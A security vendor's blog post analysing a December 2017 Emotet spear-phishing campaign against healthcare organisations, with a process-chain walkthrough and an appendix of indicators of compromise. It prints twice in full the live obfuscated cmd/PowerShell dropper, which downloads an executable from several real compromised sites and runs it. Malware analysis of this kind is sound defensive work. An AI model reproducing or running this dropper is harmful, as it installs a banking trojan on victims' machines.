<img height="1" width="1" alt="" style="display:none" src="https://www.facebook.com/tr?id=619966238105738&amp;ev=PixelInitialized">

EMOTET Trojan: Blocked by enSilo

 During December 2017, Ensilo detected and blocked the spread of a malicious Word document (Maldoc) across multiple healthcare entities. The initial stage of infection was done via a spear-phishing email attack. The victims received an email luring them to click on a link that downloads a Maldoc from the Internet. This Maldoc contained an obfuscated macro that was responsible for performing additional tasks on their system. Once this Maldoc executed, it attempted to leverage Microsoft PowerShell to drop the Emotet Trojan and execute it as the second stage of the attack. Once the Emotet Trojan executed it attempted to create and delete files, access Windows services, and beacon to command-and-control (C2) domains and remote IP addresses. However, Ensilo Post-Infection Platform successfully detected and blocked the attack chain and prevented from the Emotet Trojan to successfully perform its malicious activities on the affected systems.

It is important to note that the spread of the Emotet Trojan via spear-phishing attacks started long before December 2017 and still actively occurring as we speak. However, the Maldoc files naming convention (as shown in Appendix A) and the duration in which Ensilo blocked these attacks suggest that the attackers simply attempted to execute their attack by leveraging the holiday season as a social-engineering technique in an effort to get more victims to fall into their holiday trap. The following report includes preliminary analysis of this attack and also includes an Indicators of Compromise (IOCs) section which provides additional IOCs related to this attack.

Preliminary Event Analysis

The initial stage of the Emotet Trojan infection was done via a spear-phishing attack. The victim received an email with the following link:

 

-osint -url "hXXp://willvinton.net/Your-Holidays-eCard/"

 

Once the victim clicked on this link, the outlook.exe process spawned the firefox.exe process and the firefox.exe process then spawned the winword.exe process suggesting that the Maldoc was downloaded successfully into the victim’s system and was executed thereafter by the victim. Figure 1 provides a visual view of this process chain:

Figure1.png

Figure 1: Downloading Maldoc

This Maldoc contained a macro with an obfuscated code. That obfuscated code was responsible for dropping and executing the Emotet Trojan payload. Once the user accessed this document via Microsoft Word, the winword.exe process then spawned the cmd.exe with the following obfuscated command line:

cmd.exe jlksjl uuuueueuueue uowe whe h dbsjk bakjbdjkasdbk heo & %C^om^S^p^Ec% /V /c set %cTzbYUaSqLMGrWb%=EAXHDwPLQw&&set %EjXkYfdFwuHUXu%=o^we^r^s&&set %trNbEdzhrDvaBVz%=fXjMhUFw&&set %IcjdFwSDLwFw%=p&&set %zAwpViEnKabiFPH%=jIJiXZiwCItTsiE&&set %UQIBwqzOGaNjjT%=^he^l^l&&set %QYlPdDhILNzHPbt%=QEQQzDXqiZTCthc&&!%IcjdFwSDLwFw%!!%EjXkYfdFwuHUXu%!!%UQIBwqzOGaNjjT%! " . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')( ('.( ([striNG]5VaVE'+'rBosEpREFerence)[1,3]+h0'+'9xh09-JoInh09h09) ( (h09 . ( uwPSHELlid[1]+uwPShELlh09+h09Id[13]+a'+'SVxaSV) ('+' ((aSVwnrfaSV+aSVraSV+aSVaaSV+aSVnaSV+aSV'+'c = nh09+'+'h09aSV+aSV'+'eaSV'+'+aSVw-oh09+h09bjeaS'+'V+'+'aSV'+'ct SaSV+aSVystem.Nh'+'09+h'+'09eaSV+aSVt.WeaSV+aSVbah09+h09SV+aSVClaSh09+h09V+'+'aSVieaSV+aSVnt;wnrnaSV+aSVsadaaSV+aSVsdaSV'+'+aSV =aSV+aSV naSV+aS'+'VeaSV+aSVwaSV+aSV-o'+'baSV+aSVject raSV+aSVandom;wnh09+h09rbaSV+h09+h09aSVcd aSV+aSV=aSV+aSh09+h09V QhKaSV+aS'+'Vht'+'aSV+aSVtaSV+aSVpaSV+aSVs://blog.aSV+aSVsiaSV+aSVplik.com/a'+'SV+aSVvTW5aSV+aSVjaSV'+'+aSVY/,aSV+aSVhtaSV+aSVtp:aSV+aSV//waSV+aSVww.aukaSV+aSVsaSV+ah09+h09SVtejaSV+aSVa.lt/ah09+h09SV+aSVVdkgi'+'aRaSV+aSV/,htt'+'paSV+aSV:aSV+aSV/'+'aSV+aS'+'V/www.noaSV+aSVphh09+h09'+'oaSV+aSVneaSV+aSV.lt/j7aSV+aSVSaSV+aSVoaSV+aSV3aSV+aSVTa'+'SV+h09+h09a'+'SVG/,http:aSV+aSV//waS'+'V+aSVwaSV+aSVw.noraSV+aSVraSV+aSVadju'+'aSV+aSVrgaaSV+aS'+'VraSh09+h09V+aSVdssaSV+aSVtaden.saSV+aSVe/XaSV+a'+'SVQYGro/,htaSV+aSVtp://aSV+aSVwww'+'.danaSV+aSVceall.aSV+'+'aSVlaSV+aSVtaSV+aSV/OIgtBKd/QaSV+h09+h09aSVhK.SaSV+'+'aSVpl'+'aSV+aSViaSV+aSVt(QhKaSV+aSV,QaSV+aSh09+h09VhK);aSV+aSVwnraSV+aSVkaaSV+aSVraSV+aSVapaSV+aSVas = wnaSV+aSVrnsah09+h09SV+a'+'SVadaaSV+aSVsd.aSV+aSVnaS'+'V+'+'aSVext(1, aSV+aSV34aSV+ah09+h09SV3aSV+aSV245);wnrh09+'+'h09aSV+aSVhh09+h'+'09uas = waSV+aSVnreaSV+aSVnv:puaSV+aSVh09+h09baSV+aSVlicaSV+aSV aSV+aSV+ aSV+aSVQhKI0bQ'+'hK + wnrkaraSV+aSVapaSV+aSVas +aSV+aSV aSV+aSVQhh09+h09K.eaSV+aSVxeaSV+aSVQaSV+aSVh09+h09hKaSV+a'+'SV;forea'+'SV+aSVach(wnraSV+aSVaaSV+aSVbc iaSV+aSVnaSV+aSV aSV+aSVwnh09+h09aSV+aSVrbch09+h09aSV+aSVd){tryh09'+'+h09{wnaSV+aSVrfranc.Doa'+'SV+aSVwnloaSV+aSVaaSV+aSh09+h09VdF'+'ile'+'(aSV+aSVwaSh09+h09V+aSVnrabc'+'.ToString(),aSV+aSV wnraSV+aSVhaSV+aSVuaaSV+aSVs);'+'aSV+aSVInvokaSV+aSVe-aSV+aSVIaSV+aSV'+'teaS'+'V+aSVm(wnaSV+aSVraSV+aSVhaSV+aSVuaSV+aSVas);braSV+aSVeaSV+aSVaaSV+aSVkaSVh09+h09+aSV;'+'}catchaSV+aSV{write-haS'+'V+'+'aSVostaSV+aSV wnr_ah09+h09SV+aS'+'V.aSV'+'+aSVEaSV+aSVxceptiaSV+aSVoh09+h09naSV+aSV.aSV+ah09+h09SVMe'+'aSV+aSVs'+'sagaSV+aSVe;}}aSV)-CrEpLach09+h09eaSVQhKaSV,[cHAR]39-CrEph09+h09Lace (['+'cHAR]119+[cHAR]110+[cHARh09+h09]114),[cHAR]36 -REPLaCE ([cHAR]73'+'+[cHAR]48+[cHAR]98),'+'[cHAR]92))'+' h09).ReplacE(h09aSVh0'+'9,[stRING][Char]39).ReplacE(h09uwPh09,h095Vah09) ) ').rEpLace(([ChAr]104+[ChAr]48+[ChAr]57),[StrInG][ChAr]39).rEpLace(([ChAr]53+[ChAr]86+[ChAr]97),[StrInG][ChAr]36) )

The cmd.exe process then spawned the PowerShell.exe process with the following command line:

Powershell.exe " . ((variaBle '*MDr*').NaME[3,11,2]-JOin'')( ('.( ([striNG]5VaVE'+'rBosEpREFerence)[1,3]+h0'+'9xh09-JoInh09h09) ( (h09 . ( uwPSHELlid[1]+uwPShELlh09+h09Id[13]+a'+'SVxaSV) ('+' ((aSVwnrfaSV+aSVraSV+aSVaaSV+aSVnaSV+aSV'+'c = nh09+'+'h09aSV+aSV'+'eaSV'+'+aSVw-oh09+h09bjeaS'+'V+'+'aSV'+'ct SaSV+aSVystem.Nh'+'09+h'+'09eaSV+aSVt.WeaSV+aSVbah09+h09SV+aSVClaSh09+h09V+'+'aSVieaSV+aSVnt;wnrnaSV+aSVsadaaSV+aSVsdaSV'+'+aSV =aSV+aSV naSV+aS'+'VeaSV+aSVwaSV+aSV-o'+'baSV+aSVject raSV+aSVandom;wnh09+h09rbaSV+h09+h09aSVcd aSV+aSV=aSV+aSh09+h09V QhKaSV+aS'+'Vht'+'aSV+aSVtaSV+aSVpaSV+aSVs://blog.aSV+aSVsiaSV+aSVplik.com/a'+'SV+aSVvTW5aSV+aSVjaSV'+'+aSVY/,aSV+aSVhtaSV+aSVtp:aSV+aSV//waSV+aSVww.aukaSV+aSVsaSV+ah09+h09SVtejaSV+aSVa.lt/ah09+h09SV+aSVVdkgi'+'aRaSV+aSV/,htt'+'paSV+aSV:aSV+aSV/'+'aSV+aS'+'V/www.noaSV+aSVphh09+h09'+'oaSV+aSVneaSV+aSV.lt/j7aSV+aSVSaSV+aSVoaSV+aSV3aSV+aSVTa'+'SV+h09+h09a'+'SVG/,http:aSV+aSV//waS'+'V+aSVwaSV+aSVw.noraSV+aSVraSV+aSVadju'+'aSV+aSVrgaaSV+aS'+'VraSh09+h09V+aSVdssaSV+aSVtaden.saSV+aSVe/XaSV+a'+'SVQYGro/,htaSV+aSVtp://aSV+aSVwww'+'.danaSV+aSVceall.aSV+'+'aSVlaSV+aSVtaSV+aSV/OIgtBKd/QaSV+h09+h09aSVhK.SaSV+'+'aSVpl'+'aSV+aSViaSV+aSVt(QhKaSV+aSV,QaSV+aSh09+h09VhK);aSV+aSVwnraSV+aSVkaaSV+aSVraSV+aSVapaSV+aSVas = wnaSV+aSVrnsah09+h09SV+a'+'SVadaaSV+aSVsd.aSV+aSVnaS'+'V+'+'aSVext(1, aSV+aSV34aSV+ah09+h09SV3aSV+aSV245);wnrh09+'+'h09aSV+aSVhh09+h'+'09uas = waSV+aSVnreaSV+aSVnv:puaSV+aSVh09+h09baSV+aSVlicaSV+aSV aSV+aSV+ aSV+aSVQhKI0bQ'+'hK + wnrkaraSV+aSVapaSV+aSVas +aSV+aSV aSV+aSVQhh09+h09K.eaSV+aSVxeaSV+aSVQaSV+aSVh09+h09hKaSV+a'+'SV;forea'+'SV+aSVach(wnraSV+aSVaaSV+aSVbc iaSV+aSVnaSV+aSV aSV+aSVwnh09+h09aSV+aSVrbch09+h09aSV+aSVd){tryh09'+'+h09{wnaSV+aSVrfranc.Doa'+'SV+aSVwnloaSV+aSVaaSV+aSh09+h09VdF'+'ile'+'(aSV+aSVwaSh09+h09V+aSVnrabc'+'.ToString(),aSV+aSV wnraSV+aSVhaSV+aSVuaaSV+aSVs);'+'aSV+aSVInvokaSV+aSVe-aSV+aSVIaSV+aSV'+'teaS'+'V+aSVm(wnaSV+aSVraSV+aSVhaSV+aSVuaSV+aSVas);braSV+aSVeaSV+aSVaaSV+aSVkaSVh09+h09+aSV;'+'}catchaSV+aSV{write-haS'+'V+'+'aSVostaSV+aSV wnr_ah09+h09SV+aS'+'V.aSV'+'+aSVEaSV+aSVxceptiaSV+aSVoh09+h09naSV+aSV.aSV+ah09+h09SVMe'+'aSV+aSVs'+'sagaSV+aSVe;}}aSV)-CrEpLach09+h09eaSVQhKaSV,[cHAR]39-CrEph09+h09Lace (['+'cHAR]119+[cHAR]110+[cHARh09+h09]114),[cHAR]36 -REPLaCE ([cHAR]73'+'+[cHAR]48+[cHAR]98),'+'[cHAR]92))'+' h09).ReplacE(h09aSVh0'+'9,[stRING][Char]39).ReplacE(h09uwPh09,h095Vah09) ) ').rEpLace(([ChAr]104+[ChAr]48+[ChAr]57),[StrInG][ChAr]39).rEpLace(([ChAr]53+[ChAr]86+[ChAr]97),[StrInG][ChAr]36) )

Thereafter, the PowerShell.exe process spawned the 16877.exe process. The 16877.exe process was the Emotet Trojan process. Figure 2 provides a visual view of this process chain:

Figure2-1.png

Figure 2: Maldoc drops The Emotet Trojan

 

At this point and onwards, the Ensilo Post-Infection Platform successfully blocked the attack chain and prevented from the Emotet Trojan to successfully perform its malicious activities on the affected system.

Note: These types of attacks can get blocked by Ensilo platform on multiple stages from an initial execution, download of a payload and a payload execution. However, if we allow execution to occur, we can see that the last stage of execution is blocked.

About the Emotet Trojan

The Emotet Trojan is a malware intended to steal financial information from victims. On execution, this malware is able to provide a backdoor access into the affected systems, exfiltrate intellectual property such as banking account credentials and passwords, drop and delete additional malware components and so on. The Emotet Trojan was detected and blocked by Ensilo contains the following static characteristics:

Filename:     16877.exe
File Hash: 
21f70466f05c1e949a271e16859023f4e121edcd2d9f86ec574cafa2b7f78566

File Size:    114688 Bytes
Compile Time: 2017-12-26 17:32:56

Final Note

This report demystified the process in which the victims received a weaponized Maldoc via a spear-phishing email all the way through executing the Emotet Trojan as a result of downloading and executing this Maldoc. The filenames involved in this attack and the duration in which the attack has occurred, suggest that the attackers leveraged the holiday season as a social-engineering attack attempting to lure more victims to download and execute their Maldoc. Yet, the most important part in this report shows how Ensilo post infection protection detected, blocked and prevented the Emotet Trojan from successfully executing on the victims’ system.

Appending A: Indicators of Compromise  

Word Document filenames:

Christmas card.doc
Christmas eCard.doc
Christmas Gift Card.doc
eCard.doc
eGift Card.doc
Gift Card for you.doc
Gift Card.doc
Happy Holidays Card.doc
Holidays Card.doc
Holidays eCard.doc
Holidays gift card.doc
Your Card.doc
Your Christmas Card.doc
Your Christmas Gift Card.doc
Your eCard.doc
Your eGift Card.doc
Your Gift Card.doc
Your Holidays Card.doc
Your Holidays eCard.doc

Malicious Word Document SHA256 Hashes:

123860594ee19f8d1d51ce2a9ee161671429f4b2bcd0dee1ee6c09573c9ba61f
a73924f6b3bc139c6f2365bc45eb1fa7727d6bfcea45ed3f9b21f97995d3daae|
c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16
9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1

Initial Malicious Word Document Download URLs:

hxxp://www.beyondphenom.com/eGift-Card/
hxxp://avantif.maindev.fr/Your-Card/
hxxp://balloons-suppliers.com/Christmas-Gift-Card/
hxxp://cfi-diecasting.com/Happy-Holidays-Card/
hxxp://christythematchmaker.com/Gift-Card-for-you/
hxxp://cypersinger.com/Invoice-75314682/

 

Sign-Up for a Demo Today

 

 

Sign-Up for a Demo Today

CATEGORIES

FEATURED ARTICLES

tag cloud